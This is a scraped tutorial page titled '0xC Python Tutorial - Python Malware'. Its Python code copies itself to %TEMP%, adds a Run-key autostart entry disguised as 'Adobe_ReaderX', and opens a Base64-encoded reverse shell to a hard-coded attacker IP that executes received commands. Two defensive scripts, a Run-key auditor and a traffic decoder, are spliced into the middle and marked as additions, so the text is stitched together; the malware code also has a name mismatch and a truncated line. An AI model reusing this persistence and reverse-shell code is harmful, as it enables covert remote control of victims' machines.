0xC Python Tutorial - Python Malware

The document discusses using Python to create malware that copies itself to the Windows temp directory and adds an entry to the registry run key to persist, then establishes a reverse shell back to an attacker's IP address. Code is provided to demonstrate these techniques.

Uploaded by

Mihai Qra
0xC Python Tutorial: Python Malware


This tutorial demonstrates some proof-of-concept code for creating malware using Python and PyInstaller. In a previous tutorial we
demonstrated how to compile a Python script as a Portable Executable (PE) using PyInstaller. Now let's demonstrate some quick
proof-of-concept code that performs malicious actions on a Windows host.
Coding the Malware:

One of the most common things you'll find with malware is that it wants to gain persistence on the victim. There are loads of ways to
achieve persistence on Windows, one of the more common being to modify the following registry key:
Software\Microsoft\Windows\CurrentVersion\Run. Below is the Python code to copy the program to the
%TEMP% directory and then make a registry modification so this code will execute when a user logs into the computer:
import sys, base64, os, socket, subprocess
from _winreg import *

def autorun(tempdir, fileName, run):
    # Copy executable to %TEMP%:
    os.system('copy %s %s' % (fileName, tempdir))

    # Queries Windows registry for key values
    # Appends autorun key to runkey array
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey = []
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)
            runkey.append(subkey[0])
            i += 1
    except WindowsError:
        pass

    # Set autorun key:
    if 'AdobeReaderX' not in runkey:
        try:
            key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_ALL_ACCESS)
            SetValueEx(key, 'Adobe_ReaderX', 0, REG_SZ, r"%TEMP%\mw.exe")
            key.Close()
        except WindowsError:
            pass
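
From the defender's side, the same Run key can be audited for exactly this pattern: a value whose target lives in %TEMP% (or another user-writable directory), or a vendor-sounding name that points outside Program Files. The script below is an added example, not part of the tutorial or its code; the entry names, paths and the two heuristics are assumptions for illustration, and the winreg collector runs only on Windows (elsewhere it falls back to a constructed sample).

```python
import re, sys

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
# Directories a legitimate autostart entry rarely lives in (compared upper-cased).
USER_WRITABLE = ("%TEMP%", "%TMP%", "%APPDATA%", "%LOCALAPPDATA%", "%USERPROFILE%")
# Vendor names commonly borrowed for plausible-looking value names.
VENDOR_NAMES = re.compile(r"adobe|microsoft|google|java|intel|nvidia", re.I)
TRUSTED_ROOTS = ("%PROGRAMFILES%", "C:\\PROGRAM FILES", "%SYSTEMROOT%", "%WINDIR%", "C:\\WINDOWS")

def target_path(command):
    """Return the executable part of a Run value (quotes and arguments dropped)."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:].split('"', 1)[0]
    return command.split(" ", 1)[0]

def audit_run_entries(entries):
    """entries: (value_name, command) pairs from a Run key -> [(name, command, reason), ...]."""
    findings = []
    for name, command in entries:
        path = target_path(command).upper()
        if path.startswith(USER_WRITABLE):
            findings.append((name, command, "target in user-writable/temp directory"))
        elif VENDOR_NAMES.search(name) and not path.startswith(TRUSTED_ROOTS):
            findings.append((name, command, "vendor-like name but target outside trusted roots"))
    return findings

def read_hklm_run():
    """Collect (name, command) pairs from the HKLM Run key (Windows only)."""
    import winreg  # standard library on Windows; the tutorial's _winreg is its Python 2 name
    entries, i = [], 0
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, RUN_KEY) as key:
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, i)
            except OSError:  # raised once the index runs past the last value
                return entries
            entries.append((name, str(value)))
            i += 1

# Constructed sample: the tutorial's entry next to two benign-looking ones.
SAMPLE = [
    ("SecurityHealth", r"%windir%\system32\SecurityHealthSystray.exe"),
    ("Adobe_ReaderX", r"%TEMP%\mw.exe"),
    ("Dropbox", r'"C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup'),
]
if __name__ == "__main__":
    entries = read_hklm_run() if sys.platform == "win32" else SAMPLE
    for name, command, reason in audit_run_entries(entries):
        print("[!] %s -> %s (%s)" % (name, command, reason))
```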

Now that we have copied this file over to the %TEMP% directory and set up persistence, we can execute the next portion of the
code, the reverse shell. I leveraged a Python reverse shell released by TrustedSec and made one modification: Base64-encoding the
network traffic:
def shell():
    # Base64 encoded reverse shell
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.1', int(443)))
    s.send('[*] Connection Established!')
    while 1:
        data = s.recv(1024)
        if data == "quit": break
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subproces
        stdout_value = proc.stdout.read() + proc.stderr.read()
        encoded = base64.b64encode(stdout_value)
        s.send(encoded)
        #s.send(stdout_value)
    s.close()

def main():
    tempdir = '%TEMP%'
    fileName = sys.argv[0]
    run = "Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)
    shell()

if __name__ == "__main__":
    main()

Now when this program executes it will open up a reverse shell back to the attacker, which in this case is a hard-coded IP in the
script, but it could easily be a domain, or maybe something in the Amazon cloud. Below is a quick screenshot demonstrating the
program executing on a Windows host and connecting back to the attacker. You can notice the network traffic is Base64 encoded:
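
The Base64 wrapping hides the command output from a casual look at the capture, but it also gives the traffic a recognisable shape: strict Base64 that decodes to mostly printable text, flowing from the victim right after a short cleartext command from the operator. The triage helper below is an added example, not code from the tutorial or from TrustedSec; the stream layout, direction labels and thresholds are assumptions, and the sample chunks are constructed to mirror the protocol described above.

```python
import base64
import binascii
import re
import string

B64_SHAPE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")
PRINTABLE = set(string.printable.encode())

def decode_if_base64_text(payload, min_len=8, printable_ratio=0.95):
    """Return the decoded text if payload is strict Base64 wrapping mostly printable
    bytes (the shape of the encoded command output above); otherwise None."""
    payload = payload.strip()
    if len(payload) < min_len or len(payload) % 4 or not B64_SHAPE.match(payload):
        return None
    try:
        raw = base64.b64decode(payload, validate=True)
    except (binascii.Error, ValueError):
        return None
    # Short words such as "hostname" are valid Base64 too; the printable check drops them.
    if not raw or sum(b in PRINTABLE for b in raw) / len(raw) < printable_ratio:
        return None
    return raw.decode("ascii", errors="replace")

def triage_stream(chunks):
    """chunks: (direction, payload) pairs from a reassembled TCP stream.
    Returns (direction, decoded_text) for every chunk that decodes to text."""
    hits = []
    for direction, payload in chunks:
        decoded = decode_if_base64_text(payload)
        if decoded is not None:
            hits.append((direction, decoded))
    return hits

# Constructed stream modelled on the tutorial's protocol: a cleartext banner from the
# implant, cleartext commands from the operator, Base64-wrapped results back.
SAMPLE_STREAM = [
    ("victim->c2", b"[*] Connection Established!"),
    ("c2->victim", b"whoami"),
    ("victim->c2", base64.b64encode(b"desktop-01\\alice\r\n")),
    ("c2->victim", b"hostname"),
    ("victim->c2", base64.b64encode(b"DESKTOP-01\r\n")),
]

if __name__ == "__main__":
    for direction, text in triage_stream(SAMPLE_STREAM):
        print("[%s] decoded: %r" % (direction, text))
```

The cleartext banner and commands are the stronger indicator in practice; the decoder is there to confirm what the encoded replies contain once such a stream is found.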


Copyright 2012-2016 Primal Security|All Rights Reserved|Powered by Coffee